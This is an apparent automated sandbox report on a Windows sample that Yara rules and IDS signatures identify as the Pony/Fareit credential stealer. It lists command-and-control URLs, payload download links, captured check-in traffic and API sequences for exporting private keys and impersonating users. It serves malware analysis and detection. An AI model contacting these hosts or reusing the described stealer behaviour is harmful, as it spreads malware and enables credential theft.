Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:50007 -> 67.215.225.205:8080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://209.59.219.70/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://67.215.225.205:8080/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://tokulances.sitebr.net/jV1.exe
Source: Malware configuration extractor	URLs: http://ftp.approachit.com/jZy.exe
Source: Malware configuration extractor	URLs: http://atualizacoes.issqn.net/FhPD.exe

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 67.215.225.205:8080

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: /Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: /Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: /Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: /Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: /Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown	TCP traffic detected without corresponding DNS query: 67.215.225.205

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_00403771 recv,

1_2_00403771

Source: unknown

HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://209.59.219.70/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phpcv
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.app
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://atualizacoes.issqn.net/FhPD.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ftp.approachit.com/jZy.exe
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://tokulances.sitebr.net/jV1.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected Pony

Source: Yara match	File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

PE file has a writeable .text section

Source: a5gvJhukP7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA1E10	0_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA2110	0_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA1300	0_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00402D3E	1_2_00402D3E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00411EE9	1_2_00411EE9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA2110	1_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA1E10	1_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA1300	1_2_00BA1300

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: String function: 00410514 appears 40 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: String function: 00404192 appears 50 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: String function: 00401BB8 appears 139 times

Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000000.1658498912.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe	Binary or memory string: OriginalFilename vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000001.00000000.1704943301.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe	Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe

Source: a5gvJhukP7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: a5gvJhukP7.exe

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@0/1

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

1_2_0040D1E9

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,

1_2_004027AF

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

1_2_00402B2A

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

1_2_0040A6AF

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA1950 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,LoadLibraryExA,GetProcAddress,ExitProcess,

0_2_00BA1950

Source: a5gvJhukP7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: a5gvJhukP7.exe, 00000001.00000003.1710942974.00000000011F1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: a5gvJhukP7.exe

ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"	Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: windows.storage.dll	Jump to behavior
